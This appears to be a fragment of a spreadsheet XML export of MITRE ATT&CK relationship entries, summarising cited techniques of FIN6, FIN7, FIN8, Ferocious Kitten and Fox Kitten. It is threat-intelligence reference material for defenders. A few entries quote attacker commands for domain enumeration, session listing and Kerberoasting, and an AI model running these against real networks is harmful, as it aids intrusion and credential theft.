    <t>[FIN6](https://attack.mitre.org/groups/G0037) has used Registry Run keys to establish persistence for its downloader tools known as HARDTACK and SHIPBREAD.(Citation: FireEye FIN6 April 2016)</t>
  </si>
  <si>
    <t>relationship--4b45b720-a606-4c52-a28a-2ef298f9b42f</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) actors have compressed data from remote systems and moved it to another staging system before exfiltration.(Citation: FireEye FIN6 April 2016)</t>
  </si>
  <si>
    <t>relationship--f875597f-06ce-4402-bfec-eb55e28369c2</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) used RDP to move laterally in victim networks.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)</t>
  </si>
  <si>
    <t>relationship--a317b097-b819-441b-b344-9f129ba6cb40</t>
  </si>
  <si>
    <t>relationship--ade72dc6-559e-4a84-9024-1a862faec6a0</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has used scheduled tasks to establish persistence for various malware it uses, including downloaders known as HARDTACK and SHIPBREAD and [FrameworkPOS](https://attack.mitre.org/software/S0503).(Citation: FireEye FIN6 April 2016)</t>
  </si>
  <si>
    <t>relationship--aea8401e-774e-47b1-86ac-220cacd11a3c</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has created Windows services to execute encoded PowerShell commands.(Citation: FireEye FIN6 Apr 2019)</t>
  </si>
  <si>
    <t>relationship--b106e9ad-dbde-43c7-a38d-da5c87e1da05</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has targeted victims with e-mails containing malicious attachments.(Citation: Visa FIN6 Feb 2019)</t>
  </si>
  <si>
    <t>relationship--0e1bf920-fd5a-4859-bf55-62e5f9817289</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has used fake job advertisements sent via LinkedIn to spearphish targets.(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>relationship--95914d60-80b6-432b-945a-316b93cb2a13</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</si>
  <si>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</si>
  <si>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relationship--5614b582-eeed-4a52-a2e0-2f756f03e26c</t>
  </si>
  <si>
    <t>To move laterally on a victim network, [FIN6](https://attack.mitre.org/groups/G0037) has used credentials stolen from various systems on which it gathered usernames and password hashes.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)(Citation: Visa FIN6 Feb 2019)</t>
  </si>
  <si>
    <t>relationship--da395019-238a-4c4e-b4cd-43947e8aa019</t>
  </si>
  <si>
    <t xml:space="preserve">[FIN6](https://attack.mitre.org/groups/G0037) has used Pastebin and Google Storage to host content for their operations.(Citation: FireEye FIN6 Apr 2019)	
</t>
  </si>
  <si>
    <t>relationship--41ba13d1-5681-402e-a847-08b7e7b12f42</t>
  </si>
  <si>
    <t>[FIN6](https://attack.mitre.org/groups/G0037) has used &lt;code&gt;kill.bat&lt;/code&gt; script to disable security tools.(Citation: FireEye FIN6 Apr 2019)</t>
  </si>
  <si>
    <t>relationship--51fa2148-9dba-4479-95d7-8d940511e10e</t>
  </si>
  <si>
    <t xml:space="preserve">[FIN6](https://attack.mitre.org/groups/G0037) has used WMI to automate the remote execution of PowerShell scripts.(Citation: Security Intelligence More Eggs Aug 2019)	</t>
  </si>
  <si>
    <t>relationship--c8e9b49a-4509-407b-9d49-1c1d6f4cb794</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has used application shim databases for persistence.(Citation: FireEye FIN7 Shim Databases)</t>
  </si>
  <si>
    <t>relationship--506acc8a-e691-4f4e-b69f-bfab84cf2c73</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) used legitimate services like Google Docs, Google Scripts, and Pastebin for C2.(Citation: FireEye FIN7 Aug 2018)</t>
  </si>
  <si>
    <t>relationship--ada291f4-524c-4400-9425-0936a03d4a41</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has used random junk code to obfuscate malware code.(Citation: Mandiant FIN7 Apr 2022)</t>
  </si>
  <si>
    <t>relationship--19ab4bf2-7498-4f53-afd7-fc1a99a96187</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</si>
  <si>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</si>
  <si>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relationship--081c68ae-de26-4ab4-9108-5c7493f34f43</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</si>
  <si>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</si>
  <si>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relationship--95fc970d-98cd-4bc9-895a-9534ba89c795</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) used SQL scripts to help perform tasks on the victim's machine.(Citation: FireEye FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)(Citation: FireEye FIN7 Aug 2018)</t>
  </si>
  <si>
    <t>relationship--1332e859-38be-45ed-9ebc-09efd7117c17</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has gained initial access by compromising a victim's software supply chain.(Citation: Mandiant FIN7 Apr 2022)</t>
  </si>
  <si>
    <t>relationship--e814521c-211d-4db9-b637-dd13ccdfed92</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has performed C2 using DNS via A, OPT, and TXT records.(Citation: FireEye FIN7 Aug 2018)</t>
  </si>
  <si>
    <t>relationship--ca2a22df-7f99-497a-8f51-cf0180308305</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has encrypted virtual disk volumes on ESXi servers using a version of Darkside ransomware.(Citation: CrowdStrike Carbon Spider August 2021)(Citation: Mandiant FIN7 Apr 2022)</t>
  </si>
  <si>
    <t>relationship--5ed383c7-a4b7-441b-8f99-a9927689aea0</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has collected files and other sensitive information from a compromised network.(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>relationship--bc0ed7ce-f99f-4d88-a3cc-81af825f311a</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has used the command `net group "domain admins" /domain` to enumerate domain groups.(Citation: Mandiant FIN7 Apr 2022)</t>
  </si>
  <si>
    <t>relationship--51db2539-ad77-4fa1-8f54-2bb6ccf603df</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has registered look-alike domains for use in phishing campaigns.(Citation: eSentire FIN7 July 2021)</t>
  </si>
  <si>
    <t>relationship--ba18e103-7479-4041-be39-4a78e0961d92</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has compromised a digital product website and modified multiple download links to point to trojanized versions of offered digital products.(Citation: Mandiant FIN7 Apr 2022)</t>
  </si>
  <si>
    <t>relationship--75270994-ea95-4744-a383-056eb96ab50d</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) spear phishing campaigns have included malicious Word documents with DDE execution.(Citation: CyberScoop FIN7 Oct 2017)</t>
  </si>
  <si>
    <t>relationship--51afbe4e-c5cd-4acd-b4e1-ff7877b78b9e</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has exfiltrated stolen data to the MEGA file sharing site.(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>relationship--f770ba6c-df62-4bd4-ab29-34a954c4f6ac</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has exploited ZeroLogon (CVE-2020-1472) against vulnerable domain controllers.(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>relationship--fe3872cb-5e08-4a04-9162-a6868ef95952</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046)'s Harpy backdoor malware can use DNS as a backup channel for C2 if HTTP fails.(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>relationship--dd9f1283-ff4b-4314-b7ce-f326d6932bab</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</si>
  <si>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</si>
  <si>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relationship--b077d81d-0449-493f-9b93-23dc0fb0b62d</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) used JavaScript scripts to help perform tasks on the victim's machine.(Citation: FireEye FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)(Citation: FireEye FIN7 Aug 2018)</t>
  </si>
  <si>
    <t>relationship--72b1c4ab-81ca-47a4-a541-ceb44580c87b</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has used Kerberoasting PowerShell commands such as, `Invoke-Kerberoast` for credential access and to enable lateral movement.(Citation: CrowdStrike Carbon Spider August 2021)(Citation: Mandiant FIN7 Apr 2022)</t>
  </si>
  <si>
    <t>relationship--df3c2022-f649-45f5-a987-5ba7a766a058</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) lured victims to double-click on images in the attachments they sent which would then execute the hidden LNK file.(Citation: FireEye FIN7 April 2017)(Citation: eSentire FIN7 July 2021)(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>relationship--9b9dad4a-c597-4979-9129-7753a7c3b3db</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has used malicious links to lure victims into downloading malware.(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>relationship--00561c3c-345e-4578-95c3-b7e0a95db7b1</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has developed malware for use in operations, including the creation of infected removable media.(Citation: FBI Flash FIN7 USB)(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>relationship--fe8004eb-df5b-43c5-bf5a-1cbe028e8663</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has created a scheduled task named “AdobeFlashSync” to establish persistence.(Citation: Morphisec FIN7 June 2017)</t>
  </si>
  <si>
    <t>relationship--37ba7858-8765-4445-a65e-d2765b673b34</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has attempted to run Darkside ransomware with the filename sleep.exe.(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>relationship--306ab1b7-4926-43ae-8989-b0dde2a43111</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has used mshta.exe to execute VBScript to execute malicious code on victim systems.(Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>relationship--9e77b81d-6298-4233-8baa-f419031a9d64</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has used port-protocol mismatches on ports such as 53, 80, 443, and 8080 during C2.(Citation: FireEye FIN7 Aug 2018)</t>
  </si>
  <si>
    <t>relationship--921b9a4d-091a-442b-981a-0b34daa2ed6a</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) used a PowerShell script to launch shellcode that retrieved an additional payload.(Citation: FireEye FIN7 April 2017)(Citation: Morphisec FIN7 June 2017)(Citation: FBI Flash FIN7 USB)(Citation: Mandiant FIN7 Apr 2022)</t>
  </si>
  <si>
    <t>relationship--4856de0a-2635-4081-97a8-3f15593c2aa5</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) malware has created Registry Run and RunOnce keys to establish persistence, and has also added items to the Startup folder.(Citation: FireEye FIN7 April 2017)(Citation: FireEye FIN7 Aug 2018)</t>
  </si>
  <si>
    <t>relationship--74859e2a-7a8f-4b87-b75c-7286b3de685c</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has utilized the remote management tool Atera to download malware to a compromised system.(Citation: Mandiant FIN7 Apr 2022)</t>
  </si>
  <si>
    <t>relationship--42684416-c3f0-4668-9c86-77482740179e</t>
  </si>
  <si>
    <t xml:space="preserve">[FIN7](https://attack.mitre.org/groups/G0046) has used RDP to move laterally in victim environments.(Citation: CrowdStrike Carbon Spider August 2021)
</t>
  </si>
  <si>
    <t>relationship--58dd2402-7b8a-4ed0-8fd3-7b9656b543b8</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) actors have mailed USB drives to potential victims containing malware that downloads and installs various backdoors, including in some cases for ransomware operations.(Citation: FBI Flash FIN7 USB)</t>
  </si>
  <si>
    <t>relationship--c7697490-b9ad-45b9-9e69-ddc4a7a6d94c</t>
  </si>
  <si>
    <t xml:space="preserve">[FIN7](https://attack.mitre.org/groups/G0046) has used `rundll32.exe` to execute malware on a compromised network.(Citation: Mandiant FIN7 Apr 2022) </t>
  </si>
  <si>
    <t>relationship--3832d04e-41aa-456d-8104-b0a1fa2c12bb</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has used SSH to move laterally through victim environments.(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>relationship--15d87b47-837d-4f62-9d78-4ec092c111d2</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) malware has created scheduled tasks to establish persistence.(Citation: FireEye FIN7 April 2017)(Citation: Morphisec FIN7 June 2017)(Citation: FireEye FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>relationship--1f7b17e9-9ad3-42dd-ab92-e3afe752247b</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) captured screenshots and desktop video recordings.(Citation: DOJ FIN7 Aug 2018)</t>
  </si>
  <si>
    <t>relationship--f443e72c-68a6-4d46-b2aa-96b1aafd5f6b</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</si>
  <si>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</si>
  <si>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relationship--cf9e7512-c510-4605-9035-f60335c351f4</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has conducted broad phishing campaigns using malicious links.(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>relationship--34319090-f87a-431b-a6c1-38d8494495b6</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has used the command `cmd.exe /C quser` to collect user session information.(Citation: Mandiant FIN7 Apr 2022)</t>
  </si>
  <si>
    <t>relationship--1f548074-df9e-4029-842b-7d774e2f1093</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has utilized a variety of tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154), [PowerSploit](https://attack.mitre.org/software/S0194), and the remote management tool, Atera for targeting efforts.(Citation: Mandiant FIN7 Apr 2022)</t>
  </si>
  <si>
    <t>relationship--5f0b2cd5-125e-4473-8623-5f5a7dc09caf</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has staged legitimate software, that was trojanized to contain an Atera agent installer, on Amazon S3.(Citation: Mandiant FIN7 Apr 2022)</t>
  </si>
  <si>
    <t>relationship--d9a18216-bb4f-445a-92a9-abd99ba0609a</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) used images embedded into document lures that only activate the payload when a user double clicks to avoid sandboxes.(Citation: FireEye FIN7 April 2017)</t>
  </si>
  <si>
    <t>relationship--6aaf2c92-43a3-42f5-81ab-220c854607b0</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has used TightVNC to control compromised hosts.(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>relationship--2f1588c1-16b9-4cb2-b94c-1756829183ae</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has harvested valid administrative credentials for lateral movement.(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>relationship--08e70a50-f4fe-4856-9bd1-a7098f802fca</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) created a custom video recording capability that could be used to monitor operations in the victim's environment.(Citation: FireEye FIN7 Aug 2018)(Citation: DOJ FIN7 Aug 2018)</t>
  </si>
  <si>
    <t>relationship--91926031-c1b4-462b-8597-20b10e7211ef</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) used VBS scripts to help perform tasks on the victim's machine.(Citation: FireEye FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)(Citation: CrowdStrike Carbon Spider August 2021)</t>
  </si>
  <si>
    <t>relationship--3f0e6cfa-7edc-4eaa-bc03-754d0f46d605</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has set up Amazon S3 buckets to host trojanized digital products.(Citation: Mandiant FIN7 Apr 2022)</t>
  </si>
  <si>
    <t>relationship--64f76b74-cafc-4cf5-9c86-f7305fbaf61c</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) used the command prompt to launch commands on the victim’s machine.(Citation: FireEye FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)(Citation: Mandiant FIN7 Apr 2022)</t>
  </si>
  <si>
    <t>relationship--cbf95438-c89f-451f-9895-eaeb3fb65104</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) has used WMI to install malware on targeted systems.(Citation: eSentire FIN7 July 2021)</t>
  </si>
  <si>
    <t>relationship--3a30af61-b9b4-488e-aebc-dee4dfce52b6</t>
  </si>
  <si>
    <t>[FIN7](https://attack.mitre.org/groups/G0046) created new Windows services and added them to the startup directories for persistence.(Citation: FireEye FIN7 Aug 2018)</t>
  </si>
  <si>
    <t>relationship--bde512f7-afbb-4fe5-8df7-53a00bdadc79</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used RAR to compress collected data before exfiltration.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>relationship--b6e427c5-ae51-4240-b91e-3c417cc4e1f0</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used the Plink utility to tunnel RDP back to C2 infrastructure.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>relationship--e4c23aa3-edf1-4f6e-ae86-f709d7c306ee</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has injected malicious code into a new svchost.exe process.(Citation: Bitdefender FIN8 July 2021)</t>
  </si>
  <si>
    <t>relationship--eda4c39d-9615-4c5f-8086-64150137df7f</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has cleared logs during post compromise cleanup activities.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>relationship--1083404f-57df-48dc-a3b9-8c60fb5fd2f7</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used an expired open-source X.509 certificate for testing in the OpenSSL repository, to connect to actor-controlled C2 servers.(Citation: Bitdefender Sardonic Aug 2021)</t>
  </si>
  <si>
    <t>relationship--3b72eb79-c499-4f2a-b6aa-464bb3bbd42d</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</si>
  <si>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</si>
  <si>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relationship--82ce1bf6-b1a1-4a82-9c86-8ff372d6a873</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has deployed ransomware such as [Ragnar Locker](https://attack.mitre.org/software/S0481), White Rabbit, and attempted to execute Noberus on compromised networks.(Citation: Symantec FIN8 Jul 2023)</t>
  </si>
  <si>
    <t>relationship--f36a77f2-dfab-4636-a796-67e6416031ef</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has retrieved a list of trusted domains by using &lt;code&gt;nltest.exe /domain_trusts&lt;/code&gt;.(Citation: Bitdefender FIN8 July 2021)</t>
  </si>
  <si>
    <t>relationship--f5f833ab-9ee4-477b-854a-b7b4446761ba</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used FTP to exfiltrate collected data.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>relationship--177950ec-8f25-4243-8d9d-a15e24ff7c98</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has exploited the CVE-2016-0167 local vulnerability.(Citation: FireEye Fin8 May 2016)(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>relationship--45626c7f-c401-427b-9589-c91a4b2a4f7f</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</si>
  <si>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</si>
  <si>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relationship--92bc1e7b-6700-4d11-b82e-24284f30c2d7</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used remote code execution to download subsequent payloads.(Citation: FireEye Fin8 May 2016)(Citation: Bitdefender FIN8 July 2021)</t>
  </si>
  <si>
    <t>relationship--c3dd754d-3e2b-4761-8d21-2e7a52fc6616</t>
  </si>
  <si>
    <t xml:space="preserve">[FIN8](https://attack.mitre.org/groups/G0061) has used the [Ping](https://attack.mitre.org/software/S0097) command to check connectivity to actor-controlled C2 servers.(Citation: Bitdefender Sardonic Aug 2021) </t>
  </si>
  <si>
    <t>relationship--fd135724-b4b3-470a-95c6-43191f99dcb6</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) harvests credentials using Invoke-Mimikatz or Windows Credentials Editor (WCE).(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>relationship--331e59e9-0d10-4c2d-ba92-e8eb0de1cc95</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used malicious e-mail attachments to lure victims into executing malware.(Citation: FireEye Obfuscation June 2017)(Citation: FireEye Fin8 May 2016)(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>relationship--3aacea96-941f-4a1d-8981-36d2a0e62cf3</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used emails with malicious links to lure victims into installing malware.(Citation: FireEye Obfuscation June 2017)(Citation: FireEye Fin8 May 2016)(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>relationship--5a374aec-ae82-4c99-bbc2-34c4050a9932</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has deleted Registry keys during post compromise cleanup activities.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>relationship--f8ff17c3-2921-40c2-b4a9-19ee7678397a</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</si>
  <si>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</si>
  <si>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relationship--cd001a55-ed41-4109-9090-41bebed9113a</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) aggregates staged data from a network into a single location.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>relationship--b8df1d2c-f014-4f51-a277-8050adafb865</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used RDP for lateral movement.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>relationship--31a6eec8-0281-4973-a2af-ebf30e317a9f</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</si>
  <si>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</si>
  <si>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relationship--ee46b157-d368-42e4-98f6-b76f6e65c9bd</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</si>
  <si>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</si>
  <si>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relationship--a83e6a0f-fc31-472f-bffd-135dfc5ce683</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used scheduled tasks to maintain RDP backdoors.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>relationship--55ea8954-9b81-45e4-89c9-a6b55f5b2541</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used Registry keys to detect and avoid executing in potential sandboxes.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>relationship--1ce61b6a-b1fd-4e21-874a-774a1487fa12</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has distributed targeted emails containing Word documents with embedded malicious macros.(Citation: FireEye Obfuscation June 2017)(Citation: FireEye Fin8 May 2016)(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>relationship--9c1ec4da-96d9-4173-b944-77c341a19572</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has distributed targeted emails containing links to malicious documents with embedded macros.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>relationship--52e319bc-d6ee-4ab5-a3ae-36f0477cac67</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used PowerShell Scripts to check the architecture of a compromised machine before the selection of a 32-bit or 64-bit version of a malicious .NET loader.(Citation: Symantec FIN8 Jul 2023)</t>
  </si>
  <si>
    <t>relationship--c8342b87-ceea-40e0-a9ad-11b72aa1378f</t>
  </si>
  <si>
    <t xml:space="preserve">[FIN8](https://attack.mitre.org/groups/G0061) has executed the command `quser` to display the session details of a compromised machine.(Citation: Symantec FIN8 Jul 2023) </t>
  </si>
  <si>
    <t>relationship--17bace22-3930-4b7e-9fd1-1473da5496ff</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used a malicious framework designed to impersonate the lsass.exe/vmtoolsd.exe token.(Citation: Bitdefender FIN8 July 2021)(Citation: Symantec FIN8 Jul 2023)</t>
  </si>
  <si>
    <t>relationship--f950b817-9082-4299-a310-6b48fc347ebc</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used open-source tools such as [Impacket](https://attack.mitre.org/software/S0357) for targeting efforts.(Citation: Bitdefender Sardonic Aug 2021)</t>
  </si>
  <si>
    <t>relationship--3a20f6f1-0e1b-4d8e-8461-eb41e4c6b5da</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used valid accounts for persistence and lateral movement.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>relationship--060e7485-d2a9-4aa2-a742-58f7e4e6086a</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used HTTPS for command and control.(Citation: Bitdefender FIN8 July 2021)</t>
  </si>
  <si>
    <t>relationship--a1c0db19-e187-480b-85d4-6e5672480d33</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used &lt;code&gt;sslip.io&lt;/code&gt;, a free IP to domain mapping service that also makes SSL certificate generation easier for traffic encryption, as part of their command and control.(Citation: Bitdefender FIN8 July 2021)</t>
  </si>
  <si>
    <t>relationship--68a9519f-c65a-451e-9126-5946ac6844c6</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</si>
  <si>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</si>
  <si>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relationship--e090281c-4ab9-4b6f-ab63-f22606f7e620</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</si>
  <si>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</si>
  <si>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relationship--fd763f17-409d-428b-825c-f731b0ad88cc</t>
  </si>
  <si>
    <t>[FIN8](https://attack.mitre.org/groups/G0061) has used WMI event subscriptions for persistence.(Citation: Bitdefender FIN8 July 2021)</t>
  </si>
  <si>
    <t>relationship--5014ed30-309e-4bed-af86-ec5603736342</t>
  </si>
  <si>
    <t>[Ferocious Kitten](https://attack.mitre.org/groups/G0137) has acquired domains imitating legitimate sites.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>relationship--e9375a8c-4574-40a9-a3c2-a9fe036928a6</t>
  </si>
  <si>
    <t>11 October 2021</t>
  </si>
  <si>
    <t>[Ferocious Kitten](https://attack.mitre.org/groups/G0137) has attempted to convince victims to enable malicious content within a spearphishing email by including an odd decoy message.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>relationship--471ea836-ef54-4306-b131-cf66de5811c4</t>
  </si>
  <si>
    <t>[Ferocious Kitten](https://attack.mitre.org/groups/G0137) has named malicious files &lt;code&gt;update.exe&lt;/code&gt; and loaded them into the compromise host's “Public” folder.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>relationship--59d3a882-3f6d-442a-8fbe-bb2f9cecd2f5</t>
  </si>
  <si>
    <t>[Ferocious Kitten](https://attack.mitre.org/groups/G0137) has used right-to-left override to reverse executables’ names to make them appear to have different file extensions, rather than their real ones.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>relationship--54501ca8-7205-4b83-87cb-b2235bc0ec71</t>
  </si>
  <si>
    <t>[Ferocious Kitten](https://attack.mitre.org/groups/G0137) has conducted spearphishing campaigns containing malicious documents to lure victims to open the attachments.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>relationship--8f8caa9d-b728-4b54-88b0-b7cd3646f437</t>
  </si>
  <si>
    <t>[Ferocious Kitten](https://attack.mitre.org/groups/G0137) has obtained open source tools for its operations, including JsonCPP and Psiphon.(Citation: Kaspersky Ferocious Kitten Jun 2021)</t>
  </si>
  <si>
    <t>relationship--ba29bbf3-4947-4676-98c4-13bf6fb79ce0</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used sticky keys to launch a command prompt.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>relationship--df898edd-0829-4222-b50b-e7cbf75a0fb4</t>
  </si>
  <si>
    <t>23 December 2020</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used 7-Zip to archive data.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>relationship--28d9ac63-ce5f-4d42-be72-6b4d99b6fda7</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has used Google Chrome bookmarks to identify internal resources and assets.(Citation: CISA AA20-259A Iran-Based Actor September 2020)</t>
  </si>
  <si>
    <t>relationship--52ecf0cd-4e5f-4331-b4d8-42618f155c5c</t>
  </si>
  <si>
    <t>[Fox Kitten](https://attack.mitre.org/groups/G0117) has brute forced RDP credentials.(Citation: ClearSky Pay2Kitten December 2020)</t>
  </si>
  <si>
    <t>relationship--1b4baaaa-f08e-4f67-8d32-a7facb21eb7b</t>
  </si>
  <si>
